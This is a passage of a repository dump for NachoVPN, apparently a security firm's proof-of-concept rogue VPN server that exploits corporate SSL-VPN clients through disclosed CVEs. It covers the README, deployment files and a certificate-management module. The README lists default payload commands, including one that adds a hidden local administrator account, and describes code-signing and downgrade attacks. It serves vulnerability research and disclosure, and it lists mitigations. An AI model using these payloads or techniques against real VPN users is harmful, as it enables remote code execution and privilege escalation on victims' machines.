Repository: AmberWolfCyber/NachoVPN
Branch: main
Commit: f1e891f8b1af
Files: 72
Total size: 410.4 KB
Directory structure:
gitextract_izup__0x/
├── .gitattributes
├── .github/
│ └── workflows/
│ └── build-docker.yml
├── .gitignore
├── Dockerfile
├── LICENSE
├── MANIFEST.in
├── README.md
├── docker-compose.yml
├── entrypoint.sh
├── requirements.txt
├── setup.py
└── src/
└── nachovpn/
├── __init__.py
├── core/
│ ├── __init__.py
│ ├── cert_manager.py
│ ├── db_manager.py
│ ├── ip_manager.py
│ ├── packet_handler.py
│ ├── plugin_manager.py
│ ├── request_handler.py
│ ├── smb_manager.py
│ └── utils.py
├── plugins/
│ ├── __init__.py
│ ├── base/
│ │ ├── __init__.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ └── 404.html
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── files/
│ │ │ ├── OnConnect.sh
│ │ │ ├── OnConnect.vbs
│ │ │ └── OnDisconnect.vbs
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── login.xml
│ │ ├── prelogin.xml
│ │ └── profile.xml
│ ├── delinea/
│ │ ├── __init__.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── GetLauncherArguments.xml
│ │ ├── GetNextProtocolHandlerVersion.xml
│ │ ├── GetSymmetricKey.xml
│ │ ├── UpdateStatusV2.xml
│ │ └── index.html
│ ├── example/
│ │ ├── __init__.py
│ │ └── plugin.py
│ ├── netskope/
│ │ ├── __init__.py
│ │ ├── files/
│ │ │ └── STAgent.msi
│ │ ├── plugin.py
│ │ └── templates/
│ │ └── auth.html
│ ├── paloalto/
│ │ ├── __init__.py
│ │ ├── msi_downloader.py
│ │ ├── msi_patcher.py
│ │ ├── pkg_generator.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── getconfig.xml
│ │ ├── prelogin.xml
│ │ ├── pwresponse.xml
│ │ ├── sslvpn-login.xml
│ │ └── sslvpn-prelogin.xml
│ ├── pulse/
│ │ ├── __init__.py
│ │ ├── config_generator.py
│ │ ├── config_parser.py
│ │ ├── funk_parser.py
│ │ ├── plugin.py
│ │ └── test/
│ │ ├── example_rules.json
│ │ └── test_policy.py
│ └── sonicwall/
│ ├── __init__.py
│ ├── files/
│ │ └── NACAgent.c
│ ├── plugin.py
│ └── templates/
│ ├── launchextender.html
│ ├── launchplatform.html
│ ├── logout.html
│ ├── welcome.html
│ └── wxacneg.html
└── server.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
* text=auto
*.sh text eol=lf
================================================
FILE: .github/workflows/build-docker.yml
================================================
name: Docker Build
on:
push:
branches: ['release']
env:
REGISTRY: ghcr.io
IMAGE_NAME: ${{ github.repository }}
jobs:
build-and-push-image:
runs-on: ubuntu-latest
permissions:
contents: read
packages: write
attestations: write
id-token: write
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Log in to the Container registry
uses: docker/login-action@65b78e6e13532edd9afa3aa52ac7964289d1a9c1
with:
registry: ${{ env.REGISTRY }}
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
- name: Extract metadata (tags, labels) for Docker
id: meta
uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7
with:
images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}
tags: |
type=ref,event=branch
type=raw,value=latest
- name: Build and push Docker image
id: push
uses: docker/build-push-action@f2a1d5e99d037542a71f64918e516c093c6f3fc4
with:
context: .
push: true
tags: ${{ steps.meta.outputs.tags }}
labels: ${{ steps.meta.outputs.labels }}
================================================
FILE: .gitignore
================================================
# Ignore virtual environment directories
env/
venv/
# Ignore environment files
.env
# Ignore compiled Python files
*.pyc
__pycache__/
# Ignore log files and debugging artifacts
*.log
# Ignore coverage reports
.coverage
.coverage.*
htmlcov/
*.cover
# Ignore cache files and directories
*.egg-info/
.eggs/
*.egg
*.pyo
*.pyd
*.pdb
.cache/
*.pytest_cache/
*.zip
# Ignore distribution files
dist/
build/
*.wheel
# Ignore your specific directories
certs/
downloads/
payloads/
pcaps/
# Ignore testing artifacts
.tox/
.nox/
.pytest_cache/
# Ignore IDE/project-specific files
.vscode/
.idea/
*.iml
# Ignore database files
*.sqlite3
*.db
# Ignore temporary files
*.tmp
*.swp
*.swo
*.bak
*.orig
.DS_Store
================================================
FILE: Dockerfile
================================================
FROM ubuntu:jammy
WORKDIR /app
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
RUN apt-get update && apt-get install -y --no-install-recommends \
gcc \
libffi-dev \
libssl-dev \
osslsigncode \
msitools \
mingw-w64 \
gcc-mingw-w64 \
python3 \
python3-pip \
python-is-python3 \
python3-nftables \
nftables \
&& apt-get clean && rm -rf /var/lib/apt/lists/*
COPY setup.py .
COPY MANIFEST.in .
COPY requirements.txt .
COPY src/ src/
RUN pip install --no-cache-dir -r requirements.txt
RUN pip install --no-cache-dir certbot
RUN python setup.py sdist bdist_wheel
RUN pip install --no-cache-dir dist/*.whl
EXPOSE 80
EXPOSE 443
COPY entrypoint.sh .
RUN chmod +x entrypoint.sh
ENTRYPOINT ["/bin/bash", "-c", "./entrypoint.sh"]
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2024 AmberWolf Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: MANIFEST.in
================================================
recursive-include src/nachovpn/plugins **/templates/*
recursive-include src/nachovpn/plugins **/files/*
================================================
FILE: README.md
================================================
# NachoVPN 🌮🔒
NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients, using a rogue VPN server.
It uses a plugin-based architecture so that support for additional SSL-VPN products can be contributed by the community. It currently supports various popular corporate VPN products, such as Cisco AnyConnect, SonicWall NetExtender, Palo Alto GlobalProtect, and Ivanti Connect Secure.
For further details, see our [blog post](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/), and HackFest Hollywood 2024 presentation [[slides](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf)|[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)].
## Installation
### Prerequisites
* Python 3.9 or later
* Docker (optional)
* osslsigncode (Linux only)
* msitools (Linux only)
* python3-netfilter (Linux only)
* git
### Linux Setup
NachoVPN is built and tested on Ubuntu 22.04.
* Install `python3-nftables` and `nftables`
* Optionally use `setcap` to avoid `sudo` requirement:
```bash
sudo setcap 'cap_net_raw,cap_net_bind_service,cap_net_admin=eip' /usr/bin/python3.10
```
* Enable IP forwarding:
```bash
sudo sysctl -w net.ipv4.ip_forward=1
```
### Installing from source
NachoVPN can be installed from GitHub using pip. Note that this requires git to be installed.
First, create a virtual environment.
On Linux, ensure that the virtual env has access to the system `site-packages`, so that `nftables` works:
```bash
python3 -m venv env --system-site-packages
source env/bin/activate
```
On Windows, nftables (and thus packet forwarding) is disabled, so use:
```bash
python -m venv env
.\env\Scripts\activate
```
Then, install NachoVPN:
```bash
pip install git+https://github.com/AmberWolfCyber/NachoVPN.git
```
If you prefer to use Docker, then you can pull the container from the GitHub Container Registry:
```bash
docker pull ghcr.io/AmberWolfCyber/nachovpn:release
```
## Building for distribution
### Building a wheel file
First, clone this repository, and install `setuptools` and `wheel` via pip. You can then run the `setup.py` script:
```bash
git clone https://github.com/AmberWolfCyber/NachoVPN
pip install -U setuptools wheel
python setup.py bdist_wheel
```
This will generate a wheel file in the `dist` directory, which can be installed with pip:
```bash
pip install dist/nachovpn-1.0.0-py3-none-any.whl
```
### Building for local development
Alternatively, for local development you can install the package in editable mode using:
```bash
pip install -e .
```
### Building a container image
You can build the container image with the following command:
```bash
docker build -t nachovpn:latest .
```
## Running
To run the server as standalone, use:
```
python -m nachovpn.server
```
Alternatively, you can run the server using Docker:
```bash
docker run -e SERVER_FQDN=connect.nachovpn.local -e EXTERNAL_IP=1.2.3.4 -v ./certs:/app/certs -p 80:80 -p 443:443 --rm -it nachovpn
```
This will generate a certificate for the `SERVER_FQDN` using certbot, and save it to the `certs` directory, which we've mounted into the container.
Alternatively, for testing purposes, you can skip the certificate generation by setting the `SKIP_CERTBOT` environment variable.
This will generate a self-signed certificate instead.
```bash
docker run -e SERVER_FQDN=connect.nachovpn.local -e SKIP_CERTBOT=1 -e EXTERNAL_IP=1.2.3.4 -p 443:443 --rm -it nachovpn
```
An example [docker-compose file](docker-compose.yml) is also provided for convenience.
### Debugging
You can run `nachovpn` with the `-d` or `--debug` command line arguments in order to increase the verbosity of logging, which can aid in debugging.
Alternatively, if the logging is too noisy, you can use the `q` or `--quiet` command line argument instead.
### Plugins
NachoVPN supports the following plugins and capabilities:
| Plugin | Product | CVE | Windows RCE | macOS RCE | Privileged | URI Handler | Packet Capture | Demo |
| -------- | ----------- | -------- | -------- | -------- | -------- | -------- | -------- | ---- |
| Cisco | Cisco AnyConnect | N/A | ✅ | ✅ | ❌ | ❌ | ✅ | [Windows](https://vimeo.com/1024773762) / [macOS](https://vimeo.com/1024773668) |
| SonicWall | SonicWall NetExtender | [CVE-2024-29014](https://blog.amberwolf.com/blog/2024/november/sonicwall-netextender-for-windows---rce-as-system-via-epc-client-update-cve-2024-29014/) | ✅ | ❌ | ✅ | ✅ | ❌ | [Windows](https://vimeo.com/1024774407) |
| PaloAlto | Palo Alto GlobalProtect | [CVE-2024-5921](https://blog.amberwolf.com/blog/2024/november/palo-alto-globalprotect---code-execution-and-privilege-escalation-via-malicious-vpn-server-cve-2024-5921/) [(partial fix)](https://blog.amberwolf.com/blog/2025/august/nachovpn-update---palo-alto-globalprotect/) | ✅ | ✅ | ✅ | ❌ | ✅ | [Windows](https://vimeo.com/1024774239) / [macOS](https://vimeo.com/1024773987) / [iOS](https://vimeo.com/1024773956) |
| PulseSecure | Ivanti Connect Secure | [CVE-2020-8241 (bypassed)](https://blog.amberwolf.com/blog/2025/july/nachovpn-update---ivanti-connect-secure/) | ✅ | ✅ | ✅ | ✅ (Windows only - disabled by default in [22.8R1](https://help.ivanti.com/ps/help/en_US/ISAC/22.X/rn-22.X/noteworthy-information.htm)) | ✅ | [Windows](https://vimeo.com/1024773914) |
| Netskope | Netskope | [CVE-2025-0309](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) | ✅ | ❌ | ✅ | ❌ | ❌ | [Windows](https://vimeo.com/1114191607) |
| Delinea | Protocol Handler | [CVE-2026-????](https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/) | ✅ | ✅ | ❌ | ✅ | ❌ | [Windows](https://vimeo.com/1168821295) |
#### URI handlers
* The Ivanti Connect Secure (Pulse Secure) URI handler can be triggered by visiting the `/pulse` URL on the NachoVPN server.
* The SonicWall NetExtender URI handler can be triggered by visiting the `/sonicwall` URL on the NachoVPN server. This requires that the SonicWall Connect Agent is installed on the client machine.
* The Delinea URI handler can be triggered by visiting the `/delinea` URL on the NachoVPN server.
#### Operating Notes
* It is recommended to use a TLS certificate that is signed by a trusted Certificate Authority. The docker container automates this process for you, using certbot. If you do not use a trusted certificate, then NachoVPN will generate a self-signed certificate instead, which in most cases will either cause the client to prompt with a certificate warning, or it will refuse to connect unless you modify the client settings to accept self-signed certificates. For the Palo Alto GlobalProtect plugin, this will also cause the MSI installer to fail.
* In order to simulate a valid codesigning certificate for the SonicWall plugin, NachoVPN will sign the `NACAgent.exe` payload with a self-signed certificate. For testing purposes, you can download and install this CA certificate from `/sonicwall/ca.crt` before triggering the exploit. For production use-cases, you will need to obtain a valid codesigning certificate from a public CA, sign your `NACAgent.exe` payload, and place it in the `payloads` directory (or volume mount it into `/app/payloads`, if using docker).
* For convenience, a default `NACAgent.exe` payload is generated for the SonicWall plugin, and written to the `payloads` directory. This simply spawns a new `cmd.exe` process on the current user's desktop, running as `SYSTEM`.
* The Palo Alto GlobalProtect plugin requires that the MSI installers and `msi_version.txt` file are present in the `downloads` directory. Either add these manually, or run the `msi_downloader.py` script to download them.
* To perform the Palo Alto GlobalProtect downgrade attack, ensure that the `GlobalProtect.msi.old` and `GlobalProtect64.msi.old` are present in the `downloads` folder. These files should contain the *unmodified* MSI installers for a version *prior* to 6.2.6 (e.g. 6.2.5).
#### Disabling a plugin
To disable a plugin, add it to the `DISABLED_PLUGINS` environment variable. For example:
```bash
DISABLED_PLUGINS=CiscoPlugin,SonicWallPlugin
```
### Environment Variables
NachoVPN is configured using environment variables. This makes it easily compatible with containerised deployments.
Global environment variables:
| Variable | Description | Default |
| -------- | ----------- | ------- |
| `SERVER_FQDN` | The fully qualified domain name of the server. | `connect.nachovpn.local` |
| `EXTERNAL_IP` | The external IP address of the server. | `127.0.0.1` |
| `WRITE_PCAP` | Whether to write captured PCAP files to disk. | `false` |
| `DISABLED_PLUGINS` | A comma-separated list of plugins to disable. | |
| `USE_DYNAMIC_SERVER_THUMBPRINT` | Whether to calculate the server certificate thumbprint dynamically from the server (useful if behind a proxy). | `false` |
| `SERVER_SHA1_THUMBPRINT` | Allows overriding the calculated SHA1 thumbprint for the server certificate. | |
| `SERVER_MD5_THUMBPRINT` | Allows overriding the calculated MD5 thumbprint for the server certificate. | |
| `SMB_ENABLED` | Enables the SMB share, available via the tunnel at `\\10.10.0.1\` | `false` |
| `SMB_SHARE_NAME` | The name to use for the SMB share | `SHARE` |
| `SMB_SHARE_PATH` | The path to the directory to use for the SMB share | `smb` |
| `TUNNEL_PRIVATE` | When set to `true`, enables tunneling but disables internet forwarding for VPN clients. Clients can only access the SMB share. | `false` |
| `TUNNEL_FULL` | When set to `true`, enables full tunneling and allows VPN clients to access the internet. Also implies `TUNNEL_PRIVATE=true`. | `false` |
Plugin specific environment variables:
| Variable | Description | Default |
| -------- | ----------- | ------- |
| `VPN_NAME` | The name of the VPN profile, which is presented to the client for Cisco AnyConnect. | `NachoVPN` |
| `PULSE_LOGON_SCRIPT` | The path to the Pulse Secure logon script. | `C:\Windows\System32\calc.exe` |
| `PULSE_LOGON_SCRIPT_MACOS` | The path to the Pulse Secure logon script for macOS. | |
| `PULSE_DNS_SUFFIX` | The DNS suffix to be used for Pulse Secure connections. | `nachovpn.local` |
| `PULSE_USERNAME` | The username to be pre-filled in the Pulse Secure logon dialog. | |
| `PULSE_SAVE_CONNECTION` | Whether to save the Pulse Secure connection in the user's client. | `false` |
| `PULSE_ANONYMOUS_AUTH` | Whether to use anonymous authentication for Pulse Secure connections. If set to `true`, the user will not be prompted for a username or password. | `false` |
| `PULSE_HOST_CHECKER_RULES_FILE` | A JSON file containing a list of registry-based host-checker rules for ICS. See example in `src/nachovpn/plugins/pulse/test/example_rules.json` | |
| `PALO_ALTO_MSI_ADD_FILE` | The path to a file to be added to the Palo Alto installer MSI. | |
| `PALO_ALTO_MSI_COMMAND` | The command to be executed by the Palo Alto installer MSI. | `net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add` |
| `PALO_ALTO_FORCE_PATCH` | Whether to force the patching of the MSI installer if it already exists in the payloads directory. | `false` |
| `PALO_ALTO_PKG_COMMAND` | The command to be executed by the Palo Alto installer PKG on macOS. | `touch /tmp/pwnd` |
| `CISCO_COMMAND_WIN` | The command to be executed by the Cisco AnyConnect OnConnect.vbs script on Windows. | `calc.exe` |
| `CISCO_COMMAND_MACOS` | The command to be executed by the Cisco AnyConnect OnConnect.sh script on macOS. | `touch /tmp/pwnd` |
## Mitigations
We recommend the following mitigations:
* Ensure SSL-VPN clients are updated to the latest version available from the vendor.
* Most VPN clients support the concept of locking down the VPN profile to a specific endpoint, or using an always-on VPN mode. This should be enabled where possible.
* Unfortunately, in some cases this lockdown can be removed by a malicious local user, therefore it is also recommended to use host-based firewall rules to restrict the IP addresses that the VPN client can communicate with.
* Consider using an Application Control policy, such as WDAC, or an EDR solution to ensure that only approved executables and scripts can be executed by the VPN client.
* Detect and alert on VPN clients executing non-standard child processes.
## References
* [AmberWolf Blog: NachoVPN](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/)
* [HackFest Hollywood 2024: Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells, Rich Warren & David Cash](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf) [[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)]
* [BlackHat 2008: Leveraging the Edge: Abusing SSL VPNs, Mike Zusman](https://www.blackhat.com/presentations/bh-usa-08/Zusman/BH_US_08_Zusman_SSL_VPN_Abuse.pdf)
* [BlackHat 2019: Infiltrating Corporate Intranet Like NSA, Orange Tsai & Meh Chang](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)
* [NCC Group: Making New Connections: Leveraging Cisco AnyConnect Client to Drop and Run Payloads, David Cash & Julian Storr](https://www.nccgroup.com/uk/research-blog/making-new-connections-leveraging-cisco-anyconnect-client-to-drop-and-run-payloads/)
* [The OpenConnect Project](https://www.infradead.org/openconnect/)
## Contributing
We welcome contributions! Please open an issue or raise a Pull Request.
If you're interested in developing a new plugin, you can take a look at the [ExamplePlugin](src/nachovpn/plugins/example/plugin.py) to get started.
## License
NachoVPN is licensed under the MIT license. See the [LICENSE](LICENSE) file for details.
================================================
FILE: docker-compose.yml
================================================
services:
nachovpn:
container_name: nachovpn
build:
context: .
dockerfile: Dockerfile
restart: unless-stopped
ports:
- "443:443"
- "80:80"
volumes:
- ./certs/:/app/certs/
- ./payloads/:/app/payloads/
- ./downloads/:/app/downloads/
- ./payloads/:/app/payloads/
environment:
- SERVER_FQDN=${SERVER_FQDN:-}
- EXTERNAL_IP=${EXTERNAL_IP:-}
- SKIP_CERTBOT=${SKIP_CERTBOT:-}
networks:
- backend
networks:
backend:
================================================
FILE: entrypoint.sh
================================================
#!/bin/bash
#if [[ -z "${SERVER_FQDN}" ]]; then
# echo "Error: SERVER_FQDN is not set or is empty"
# exit 1
#fi
#if [[ -z "${EXTERNAL_IP}" ]]; then
# echo "Error: EXTERNAL_IP is not set or is empty"
# exit 1
#fi
CERT_PATH="/app/certs/server-dns.crt"
KEY_PATH="/app/certs/server-dns.key"
if [[ -n "${SKIP_CERTBOT}" ]]; then
echo "SKIP_CERTBOT is set. Skipping Certbot execution."
elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then
echo "WEBSITE_HOSTNAME is set. Skipping Certbot execution."
elif [[ -f "$CERT_PATH" && -f "$KEY_PATH" ]]; then
echo "Certificate and key already exist. Skipping Certbot execution."
else
# Request a certificate from letsencrypt
certbot certonly \
--standalone \
--preferred-challenges http-01 \
--register-unsafely-without-email \
--agree-tos \
--non-interactive \
--no-eff-email \
--domain "$SERVER_FQDN"
if [[ $? -eq 0 ]]; then
echo "Certificate successfully generated."
# Copy the certs
cp "/etc/letsencrypt/live/$SERVER_FQDN/fullchain.pem" "$CERT_PATH"
cp "/etc/letsencrypt/live/$SERVER_FQDN/privkey.pem" "$KEY_PATH"
echo "Certificate and key copied to:"
echo " Certificate: $CERT_PATH"
echo " Key: $KEY_PATH"
else
echo "Certbot failed to generate the certificate."
exit 2
fi
fi
# Build CLI arguments
CLI_ARGS=""
# Check for SERVER_PORT or WEBSITE_HOSTNAME (implies port 80)
if [[ -n "${SERVER_PORT}" ]]; then
CLI_ARGS="$CLI_ARGS --port $SERVER_PORT"
elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then
CLI_ARGS="$CLI_ARGS --port 80"
fi
# Check for DISABLE_TLS or WEBSITE_HOSTNAME (implies no TLS)
if [[ -n "${DISABLE_TLS}" || -n "${WEBSITE_HOSTNAME}" ]]; then
CLI_ARGS="$CLI_ARGS --no-tls"
fi
echo "Starting nachovpn server with arguments: $CLI_ARGS"
exec python -m nachovpn.server $CLI_ARGS
================================================
FILE: requirements.txt
================================================
blinker==1.7.0
certifi>=2024.2.2
cffi==1.16.0
charset-normalizer==3.3.2
click==8.1.7
colorama==0.4.6
cryptography==42.0.5
Flask==3.0.2
idna==3.6
itsdangerous==2.1.2
Jinja2==3.1.3
MarkupSafe==2.1.5
pycparser==2.21
requests==2.31.0
urllib3==2.2.1
Werkzeug==3.0.1
scapy==2.5.0
pycryptodome==3.20.0
pem==23.1.0
cabarchive==0.2.4
PyJWT==2.10.1
pyroute2==0.9.2
impacket==0.12.0
================================================
FILE: setup.py
================================================
from setuptools import setup, find_packages
setup(
name="nachovpn",
version="1.0.0",
package_dir={"": "src"},
packages=find_packages(where="src"),
include_package_data=True,
install_requires=[
"cryptography==42.0.5",
"jinja2>=3.0.0",
"scapy>=2.5.0",
"requests>=2.31.0",
"flask>=3.0.2",
"cabarchive>=0.2.4",
"pycryptodome>=3.20.0",
"PyJWT>=2.10.1",
"pyroute2>=0.9.2",
],
python_requires=">=3.9",
description="A delicious, but malicious SSL-VPN server",
entry_points={
"console_scripts": [
"nachovpn=nachovpn.server:main",
],
},
)
================================================
FILE: src/nachovpn/__init__.py
================================================
================================================
FILE: src/nachovpn/core/__init__.py
================================================
================================================
FILE: src/nachovpn/core/cert_manager.py
================================================
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID, ObjectIdentifier
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa, ec, padding
import logging
import datetime
import hashlib
import ipaddress
import socket
import certifi
import ssl
import os
class CertManager:
def __init__(self, cert_dir=os.path.join(os.getcwd(), 'certs'), ca_common_name="VPN Root CA"):
self.cert_dir = cert_dir
os.makedirs(cert_dir, exist_ok=True)
self.ca_common_name = ca_common_name
self.server_thumbprint = {}
self.dns_name = os.getenv('SERVER_FQDN', socket.gethostname())
self.ip_address = os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname()))
def setup(self):
"""Setup the certificates and load the SSL context"""
self.load_ca_certificate()
self.load_dns_certificate()
self.load_ip_certificate()
self.create_ssl_context()
# server thumbprint is a dictionary with sha1 and md5 hashes of the DNS cert
self.server_thumbprint = self.get_cert_thumbprint(self.dns_cert_path)
def create_ssl_context(self):
"""Create SSL context with SNI support and proper TLS configuration"""
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def sni_callback(sslsocket, sni_name, sslcontext):
try:
if not sni_name:
sslsocket.context = self.ssl_context
return None
logging.debug(f"SNI hostname requested: {sni_name}")
# Create a new context for this connection
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if sni_name == self.dns_name:
ctx.load_cert_chain(self.dns_cert_path, self.dns_key_path)
else:
ctx.load_cert_chain(self.ip_cert_path, self.ip_key_path)
# Set the new context
sslsocket.context = ctx
except Exception as e:
logging.error(f"Error in SNI callback: {e}")
return None
# Set the SNI callback
self.ssl_context.sni_callback = sni_callback
# Load default certificate (IP cert)
self.ssl_context.load_cert_chain(
certfile=self.ip_cert_path,
keyfile=self.ip_key_path
)
return self.ssl_context
def load_ip_certificate(self):
"""Load or generate a certificate for the server's external IP address"""
self.ip_cert_path = os.path.join(self.cert_dir, f"server-ip.crt")
self.ip_key_path = os.path.join(self.cert_dir, f"server-ip.key")
if os.path.exists(self.ip_cert_path) and os.path.exists(self.ip_key_path) \
and self.cert_is_valid(self.ip_cert_path, self.ip_address):
logging.info(f"Using existing certificate for: {self.ip_address}")
return self.ip_cert_path, self.ip_key_path
else:
logging.info(f"Generating new certificate for: {self.ip_address}")
return self.generate_server_certificate(self.ip_cert_path, self.ip_key_path, self.ip_address,
additional_ekus=[ObjectIdentifier('1.3.6.1.5.5.7.3.5')],
additional_sans=[x509.IPAddress(ipaddress.IPv4Address(self.ip_address)),
x509.DNSName(self.dns_name)])
def load_dns_certificate(self):
"""Load or generate a certificate for the server's DNS name"""
# this certificate may be volume mounted (e.g. when using certbot outside of the container)
self.dns_cert_path = os.path.join(self.cert_dir, f"server-dns.crt")
self.dns_key_path = os.path.join(self.cert_dir, f"server-dns.key")
if os.path.exists(self.dns_cert_path) and os.path.exists(self.dns_key_path) \
and self.cert_is_valid(self.dns_cert_path, self.dns_name):
logging.info(f"Using existing certificate for: {self.dns_name}")
return self.dns_cert_path, self.dns_key_path
else:
logging.info(f"Generating new certificate for: {self.dns_name}")
return self.generate_server_certificate(self.dns_cert_path, self.dns_key_path, self.dns_name,
additional_sans=[x509.DNSName(self.dns_name)])
def load_ca_certificate(self):
"""Load or generate the CA certificate"""
self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt')
self.ca_key_path = os.path.join(self.cert_dir, 'ca.key')
if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path):
with open(self.ca_cert_path, 'rb') as f:
self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend())
with open(self.ca_key_path, 'rb') as f:
self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend())
return self.ca_cert_path, self.ca_key_path
else:
return self.generate_ca_certificate()
def cert_is_valid(self, cert_path, common_name):
"""Check if the certificate is valid"""
# skip certificate validation if we're overriding the thumbprint or retrieving it dynamically from the server
# this allows us to keep serving our origin certificate while advertising the proxy thumbprint
# this is needed for certain proxies which require the origin has a valid certificate
# if we didn't do this, the cert manager would detect a mismatch and re-generate the certificate
if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true' or \
os.getenv('SERVER_SHA1_THUMBPRINT', '') != '' or \
os.getenv('SERVER_MD5_THUMBPRINT', '') != '':
return True
with open(cert_path, 'rb') as f:
cert = x509.load_pem_x509_certificate(f.read(), default_backend())
date_valid = (cert.not_valid_before_utc \
<= datetime.datetime.now(datetime.timezone.utc) \
<= cert.not_valid_after_utc)
if not date_valid:
logging.error(f"Certificate for {common_name} is expired")
return False
cert_common_name = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value
name_valid = cert_common_name == common_name
if not name_valid:
logging.error(f"Certificate for {cert_common_name} is not valid for {common_name}")
return False
# check if the issuer Common Name matches our self-signed CA
# if the issuer name matches, but the cert is not validly signed by the current CA, return False
# this helps to identify stale certificates when the CA certificate has been re-generated
if cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value == self.ca_common_name:
try:
self.ca_cert.public_key().verify(
cert.signature,
cert.tbs_certificate_bytes,
padding.PKCS1v15(),
cert.signature_hash_algorithm,
)
logging.info(f"Certificate is validly signed by our CA. Will not re-generate.")
except Exception as e:
logging.warning(f"Certificate is not validly signed by the current CA: {e}. Will re-generate.")
return False
else:
# if the cert wasn't issued by our CA, then it's probably been signed by a public CA,
# such as Let's Encrypt, and we should not re-generate it.
# TODO: we may wish to check that the cert chains to a trusted root CA in the future,
# but it doesn't really matter for our use case
logging.warning(f"Certificate was not issued by our CA. Will not re-generate.")
return True
return True
def get_thumbprint_from_server(self, server_address):
"""Get the certificate thumbprint from a server"""
try:
context = ssl.create_default_context()
with socket.create_connection((server_address, 443), timeout=5) as sock:
with context.wrap_socket(sock, server_hostname=server_address) as wrapped_sock:
der_cert = wrapped_sock.getpeercert(binary_form=True)
thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper()
thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper()
return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5}
except (socket.timeout, ssl.SSLError, ssl.CertificateError, OSError) as e:
logging.error(f"Error getting thumbprint from server {server_address}: {e}")
return None
def get_cert_thumbprint(self, cert_path):
"""Calculate the certificate thumbprint"""
with open(cert_path, 'rb') as f:
cert = x509.load_pem_x509_certificate(f.read(), default_backend())
der_cert = cert.public_bytes(serialization.Encoding.DER)
thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper()
thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper()
# allow overriding the thumbprint for fronting scenarios
thumbprint_sha1 = os.getenv('SERVER_SHA1_THUMBPRINT', thumbprint_sha1)
thumbprint_md5 = os.getenv('SERVER_MD5_THUMBPRINT', thumbprint_md5)
return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5}
def generate_server_certificate(self, cert_path, key_path, common_name="*", additional_ekus=[], additional_sans=[]):
"""Generate a server certificate"""
# Get CA cert
if not self.ca_cert or not self.ca_key:
self.load_ca_certificate()
# Generate server private key
cert_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Build server certificate signed by CA
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name),
])
# list of SANs
san_list = additional_sans
# list of EKUs
eku_list = [
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CLIENT_AUTH,
] + additional_ekus
key_usage = x509.KeyUsage(
digital_signature=True,
key_encipherment=False,
content_commitment=False,
data_encipherment=False,
key_agreement=False,
encipher_only=False,
